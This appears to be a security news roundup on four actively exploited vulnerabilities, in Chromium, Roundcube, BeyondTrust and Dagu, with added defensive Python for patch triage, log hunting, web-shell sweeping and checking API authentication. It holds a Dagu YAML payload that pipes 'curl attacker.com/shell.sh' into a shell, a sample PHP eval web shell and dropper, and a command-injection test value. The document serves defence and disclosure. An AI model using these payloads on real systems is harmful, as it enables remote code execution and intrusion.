Four Critical Vulnerabilities Added to CISA KEV (From a Chromium Zero-Day to Default RCE)
Multiple critical vulnerabilities were added to CISA’s Known Exploited Vulnerabilities (KEV) catalog in quick succession during the same week. They span a browser, a webmail client, a privileged access management tool, and a workflow engine — different targets, but all are confirmed exploited or have public PoCs and require immediate action.
Chromium CVE-2026-2441: CSS Engine UAF Zero-Day
Overview
CVE-2026-2441 is a use-after-free (UAF) vulnerability in Chromium’s CSS engine. It has already been added to CISA’s KEV catalog, and exploit code is circulating.
A UAF is a bug where freed heap memory is referenced again, allowing an attacker to execute arbitrary code with the user’s privileges. Simply opening a malicious HTML page is enough to trigger the attack.
Affected browsers
| Browser | Fixed versions |
|---|---|
| Google Chrome | 145.0.7632.75/76 (Windows/macOS), 144.0.7559.75 (Linux) |
| Microsoft Edge | Patched release available |
| Brave | Patched release available |
| Opera | Patched release available |
Safari uses WebKit and Firefox uses Gecko, so they are not affected.
Remediation
Check versions at chrome://settings/help for Chrome and edge://settings/help for Edge. In enterprise environments, prioritize patch deployment to managed devices at the highest level.
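Checking chrome://settings/help by hand does not scale to a fleet, so here is an added example (not from the original article) that compares Chrome build strings from an inventory export against the fixed builds in the table above. The fixed builds are the Chrome values the article lists; the inventory rows are constructed, and treating the lower of the two Windows/macOS builds (145.0.7632.75) as the minimum patched version is my assumption.

```python
"""Compare installed Chrome builds against the fixed builds for CVE-2026-2441.
Added example, not code from the original article. Fixed builds are the
Chrome values from the article's table; inventory rows are constructed."""

# Per-platform fixed Chrome builds from the article. Windows/macOS shipped as
# 145.0.7632.75 and .76; the lower one is assumed to be the minimum with the fix.
FIXED_CHROME = {
    "windows": "145.0.7632.75",
    "macos": "145.0.7632.75",
    "linux": "144.0.7559.75",
}


def parse_version(text: str) -> tuple:
    """Turn '145.0.7632.75' into (145, 0, 7632, 75) for numeric comparison.
    Plain string comparison would rank '9' above '145', so compare numerically."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    return tuple(int(p) for p in parts)


def is_patched(installed: str, platform: str) -> bool:
    """True when the installed Chrome build is at or above the fixed build."""
    fixed = FIXED_CHROME[platform.lower()]
    return parse_version(installed) >= parse_version(fixed)


def triage(inventory):
    """Take (hostname, platform, version) rows from an inventory export and
    return the hosts that still need the patch, with the target build."""
    return [(host, ver, FIXED_CHROME[plat.lower()])
            for host, plat, ver in inventory
            if not is_patched(ver, plat)]


if __name__ == "__main__":
    # Constructed inventory rows, not real hosts.
    sample = [
        ("ws-01", "windows", "145.0.7632.76"),
        ("ws-02", "windows", "145.0.7632.74"),
        ("lx-01", "linux", "144.0.7559.75"),
        ("mac-01", "macos", "144.0.7559.109"),
    ]
    for host, ver, target in triage(sample):
        print(f"{host}: {ver} -> update to {target}")
```

The same comparison works for Edge, Brave and Opera once you fill in their fixed builds from the vendor release notes; the article gives no numbers for them, so they are deliberately absent from the table in the code.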
Chromium’s rendering engine, Blink, implements complex CSS processing in C++. Dynamic state changes such as cascading, inheritance, and animations can make object lifetime management error-prone. UAFs in the CSS engine have been reported repeatedly in the past, making it a major attack surface alongside the JavaScript engine.
Adding something to the KEV catalog means exploitation has been observed in the wild. If you leave it unpatched, you will get burned.
Roundcube CVE-2025-49113: CVSS 9.9 RCE That Lurked for 10+ Years
Overview
| Field | Value |
|---|---|
| CVE | CVE-2025-49113 |
| CVSS score | 9.9 (Critical) |
| Vulnerability type | Deserialization of untrusted data |
| Exploitation | Active in-the-wild exploitation confirmed |
The _from parameter in program/actions/settings/upload.php is not properly validated, allowing an authenticated user to execute arbitrary code on the server.
Weaponized within 48 hours of patch release
Reported by Dubai-based security company FearsOff and patched in June 2025. Attackers weaponized exploits within 48 hours of the patch release. The flaw had been present in the codebase for over a decade. If it can be weaponized within 48 hours, there is effectively no grace period for applying patches.
Additionally, CVE-2025-68461 (CVSS 7.2, XSS via the SVG animate tag) was added to KEV on the same day and was patched in December 2025.
Why Roundcube is targeted
Roundcube is an open-source webmail client widely adopted by European government and diplomatic organizations. It has been targeted in campaigns by APT28 (aka Fancy Bear/GRU) and Winter Vivern against European government entities and think tanks. The actor behind the KEV-listed case is unknown, but the targeting pattern aligns with past activity.
Response checklist
- Verify the Roundcube version in use
- CVE-2025-49113: Apply the patch released in June 2025
- CVE-2025-68461: Apply the patch released in December 2025
- Check authentication logs for suspicious upload operations
- Prioritize upgrading to the latest stable release
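For the "check authentication logs for suspicious upload operations" item, here is an added example (not from the original article or the Roundcube project) that hunts web-server access logs in combined format for requests that reach the upload action with a _from parameter. It matches both a direct hit on program/actions/settings/upload.php and the usual Roundcube routing through index.php with _task=settings&_action=upload. The sample log lines are constructed, and the rule that a benign _from value looks like a short token is a hunting heuristic of mine, not something Roundcube enforces.

```python
"""Hunt Apache/nginx combined-format access logs for requests to the Roundcube
upload action that carry a _from parameter (CVE-2025-49113). Added example,
not from the original article or the Roundcube project; sample lines are
constructed and the benign-value check is a heuristic."""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

VULN_PATH = "/program/actions/settings/upload.php"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# Heuristic: a benign _from value is a short token; anything else gets reviewed.
BENIGN_FROM = re.compile(r"^[A-Za-z0-9_-]{1,32}$")

# Constructed sample lines: one ordinary identity edit, two odd requests from
# a scripted client, and one unrelated mailbox request.
SAMPLE = [
    '203.0.113.7 - alice [12/Jun/2025:10:04:12 +0000] "GET /roundcube/?_task=settings&_action=upload&_from=edit-identity&_id=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - bob [12/Jun/2025:10:05:33 +0000] "POST /program/actions/settings/upload.php?_from=edit-identity%3Bwhoami HTTP/1.1" 200 77 "-" "python-requests/2.32"',
    '198.51.100.9 - bob [12/Jun/2025:10:05:34 +0000] "POST /program/actions/settings/upload.php?_from=..%2F..%2Fx HTTP/1.1" 200 77 "-" "python-requests/2.32"',
    '192.0.2.4 - carol [12/Jun/2025:10:06:01 +0000] "GET /mail/?_task=mail&_mbox=INBOX HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_upload_action(url):
    """True for a direct hit on the action file or the index.php-routed form."""
    if url.path.endswith(VULN_PATH):
        return True
    q = parse_qs(url.query)
    return q.get("_task") == ["settings"] and q.get("_action") == ["upload"]


def hunt(lines):
    """Return one finding per upload-action request that carries _from:
    (ip, user, timestamp, decoded _from value, suspicious?)."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if not is_upload_action(url):
            continue
        froms = parse_qs(url.query).get("_from")
        if not froms:
            continue
        value = froms[0]
        suspicious = BENIGN_FROM.match(value) is None
        findings.append((rec["ip"], rec["user"], rec["ts"], value, suspicious))
    return findings


def summarize(findings):
    """Count suspicious hits per (ip, user) so the noisiest accounts surface first."""
    return Counter((ip, user) for ip, user, _, _, sus in findings if sus)


if __name__ == "__main__":
    results = hunt(SAMPLE)
    for ip, user, ts, value, sus in results:
        label = "SUSPICIOUS" if sus else "review"
        print(f"{label:10} {ip} {user} {ts} _from={value!r}")
    print(summarize(results))
```

Every upload-action request is reported, not only the flagged ones, because the authenticated user who sent a clean-looking request may still be the compromised account; the suspicious flag just orders the review.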
With the KEV addition, U.S. Federal Civilian Executive Branch (FCEB) agencies are required to remediate by March 13, 2026.
Primary source: CISA KEV catalog
BeyondTrust CVE-2026-1731: CVSS 9.9 Currently Abused in Ransomware Campaigns
Overview
| Field | Value |
|---|---|
| CVE | CVE-2026-1731 |
| CVSS score | 9.9 (Critical) |
| Affected products | BeyondTrust Remote Support (RS), Privileged Remote Access (PRA) |
| Attack path | WebSocket interface |
| CISA catalog | Listed in KEV (ransomware exploitation confirmed) |
Through the WebSocket interface, attackers can inject and execute arbitrary shell commands via the thin-scc-wrapper script. According to Palo Alto Networks’ Unit 42, taking over this account enables full control of the appliance’s configuration, management sessions, and network traffic.
Observed attack chain
Unit 42 documented a multi-stage attack sequence:
- Gain access to an administrator account using a custom Python script
- Deploy a fileless PHP backdoor (evades disk-based scanning)
- Establish a persistent web shell with a Bash dropper and install VShell and Spark RAT
- Compress configuration files and PostgreSQL dumps and exfiltrate them
Targeted sectors include finance, legal, technology, higher education, wholesale/retail, and healthcare. Affected regions include the U.S., France, Germany, Australia, and Canada. Because BeyondTrust is a core privileged access management product, compromise can have organization-wide blast radius.
Recurring vulnerabilities in the same product
BeyondTrust has previously had CVE-2024-12356, which was exploited by the China-nexus threat actor “Silk Typhoon.” Unit 42 notes that input validation issues have recurred across different code execution paths. When the same class of bug reappears in the same product, it points to a design problem.
Remediation steps
- Apply BeyondTrust’s latest patches immediately
- Review WebSocket access logs and thin-scc-wrapper execution history
- Look for traces of PostgreSQL dump operations
- Search for suspicious PHP files and Bash scripts, and for VShell/Spark RAT communications
- Audit for admin accounts that were added or modified without authorization
- Also verify remediation for CVE-2024-12356
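To make the "search for suspicious PHP files and Bash scripts" step concrete, the following is an added example (not from the article, Unit 42 or BeyondTrust) that walks a web root, keeps only files modified after a cutoff, and flags PHP files that feed request input into code-execution functions and shell scripts that pipe a download into a shell. The sample tree it builds is constructed, and the function-name lists are a generic heuristic rather than indicators taken from the Unit 42 report.

```python
"""Sweep a web root for recently modified PHP files and shell scripts that look
like web shells or droppers. Added example, not from the original article,
Unit 42 or BeyondTrust; the sample tree and marker lists are constructed."""
import os
import re
import tempfile
import time

# Functions whose appearance in a recently modified PHP file deserves a look.
PHP_MARKERS = re.compile(
    r"\b(eval|assert|system|shell_exec|exec|passthru|popen|proc_open"
    r"|base64_decode|gzinflate)\s*\(", re.IGNORECASE)
# Request-derived input in the same file as the above is the stronger signal.
PHP_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")
# Shell droppers: fetch-and-pipe-to-shell or inline base64 decoding.
SHELL_MARKERS = re.compile(r"(curl|wget)\b[^\n]*\|\s*(ba)?sh\b|base64\s+(-d|--decode)")


def score_file(path):
    """Return the reasons a file is suspicious (empty list means nothing found)."""
    try:
        with open(path, "r", errors="replace") as fh:
            body = fh.read()
    except OSError:
        return []
    reasons = []
    if path.endswith(".php"):
        funcs = sorted({m.group(1).lower() for m in PHP_MARKERS.finditer(body)})
        if funcs:
            reasons.append("php-exec:" + ",".join(funcs))
        if funcs and PHP_INPUT.search(body):
            reasons.append("request-input-reaches-exec")
    elif path.endswith(".sh") or body.startswith("#!"):
        if SHELL_MARKERS.search(body):
            reasons.append("dropper-pattern")
    return reasons


def sweep(root, modified_since):
    """Walk root and report files modified after modified_since (epoch seconds)
    that score_file flags, as sorted (relative path, reasons) pairs."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.getmtime(full) < modified_since:
                continue
            reasons = score_file(full)
            if reasons:
                hits.append((os.path.relpath(full, root), reasons))
    return sorted(hits)


def build_sample_tree():
    """Constructed web root: one benign file, one web shell, one dropper."""
    root = tempfile.mkdtemp(prefix="sweep-")
    files = {
        "index.php": "<?php echo 'hello'; ?>\n",
        "cache/x.php": "<?php @eval(base64_decode($_POST['k'])); ?>\n",
        "tmp/up.sh": "#!/bin/sh\ncurl http://example.invalid/p | sh\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    # On a real appliance, point root at the web directory and set the cutoff
    # to just before the earliest suspicious login you found in the logs.
    for rel, reasons in sweep(root, time.time() - 3600):
        print(rel, reasons)
```

The modification-time cutoff is a filter, not proof: a fileless backdoor of the kind Unit 42 describes leaves nothing for this sweep to find, so pair it with the log and process-history checks in the list above.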
Original article: BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration
Dagu GHSA-6QR9-G2XW-CW92: RCE via Unauthenticated Default API (CVSS 9.8)
Overview
A CVSS 9.8 vulnerability has been found in the Go-based workflow engine Dagu. In the default configuration, API endpoints have no authentication, allowing remote execution of arbitrary shell commands. A proof of concept is publicly available.
Dagu is a lightweight workflow engine written in Go, used as a cron alternative for CI/CD and data pipelines.
How the attack works
By default, the /api/v1/dags endpoint is exposed without authentication. This endpoint accepts a DAG definition (YAML file) and runs it. An attacker can execute arbitrary commands on the host by sending a simple HTTP POST like this:
```yaml
steps:
  - name: malicious-step
    command: /bin/sh
    args:
      - -c
      - "curl attacker.com/shell.sh | sh"
```
Authentication does exist, but it requires an explicit setting and is disabled by default. This maps to CWE-306, “Missing Authentication for Critical Function.”
| Element | Assessment |
|---|---|
| Attack vector | Network (no local access required) |
| Attack complexity | Low |
| Required authentication | None |
| Impact scope | High impact to confidentiality, integrity, and availability |
Remediation
Upgrading to a fixed version is the top priority. The fix adds authMiddleware, inserting authentication checks on API endpoints. After updating, verify that API access returns 401 Unauthorized.
As a stopgap, you can enable authentication in the config file:
```yaml
# config.yaml
auth:
  mode: builtin
  basic:
    username: your_username
    password: your_password
```
Additionally, restrict Dagu’s API port (8080 by default) at the firewall, and run Dagu as a non-privileged user to limit blast radius. When Dagu runs in a Kubernetes cluster or a shared development environment, it can become a foothold for lateral movement.
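Added example, not Dagu project code: a small probe for the post-upgrade check that anonymous API access returns 401 Unauthorized, with an optional second request using the builtin credentials to confirm that legitimate users still get in. Only the /api/v1/dags path and the default port 8080 come from the article; the host and the credentials are placeholders.

```python
"""Probe a Dagu instance to confirm its API now rejects anonymous requests.
Added example, not Dagu project code. Only /api/v1/dags and port 8080 come
from the article; host and credentials below are placeholders."""
import base64
import urllib.error
import urllib.request

DAGS_ENDPOINT = "/api/v1/dags"


def fetch_status(base_url, username=None, password=None, timeout=5):
    """GET the DAG list and return the HTTP status code. 4xx/5xx codes are
    returned rather than raised; a network failure returns None."""
    req = urllib.request.Request(base_url.rstrip("/") + DAGS_ENDPOINT)
    if username is not None:
        token = base64.b64encode(f"{username}:{password}".encode()).decode()
        req.add_header("Authorization", "Basic " + token)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code
    except (urllib.error.URLError, OSError):
        return None


def classify(anon_status, auth_status):
    """Turn the probe results into a verdict.
    anon_status: status with no credentials.
    auth_status: status with the builtin credentials, or None if not probed."""
    if anon_status is None:
        return "unreachable: check firewall rules or that Dagu is running"
    if anon_status == 200:
        return "EXPOSED: API answers without authentication"
    if anon_status == 401:
        if auth_status is None or auth_status == 200:
            return "ok: anonymous access rejected with 401"
        return f"auth enforced but credentials rejected (HTTP {auth_status})"
    return f"inspect: unexpected HTTP {anon_status} for anonymous request"


if __name__ == "__main__":
    base = "http://127.0.0.1:8080"  # placeholder host; 8080 is Dagu's default port
    anon = fetch_status(base)
    auth = fetch_status(base, "your_username", "your_password")  # placeholders
    print(classify(anon, auth))
```

Run the anonymous probe from a host outside the firewall boundary as well: a 401 from localhost confirms the config change, while "unreachable" from outside confirms the port restriction the paragraph above recommends.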
Reference: GHSA-6QR9-G2XW-CW92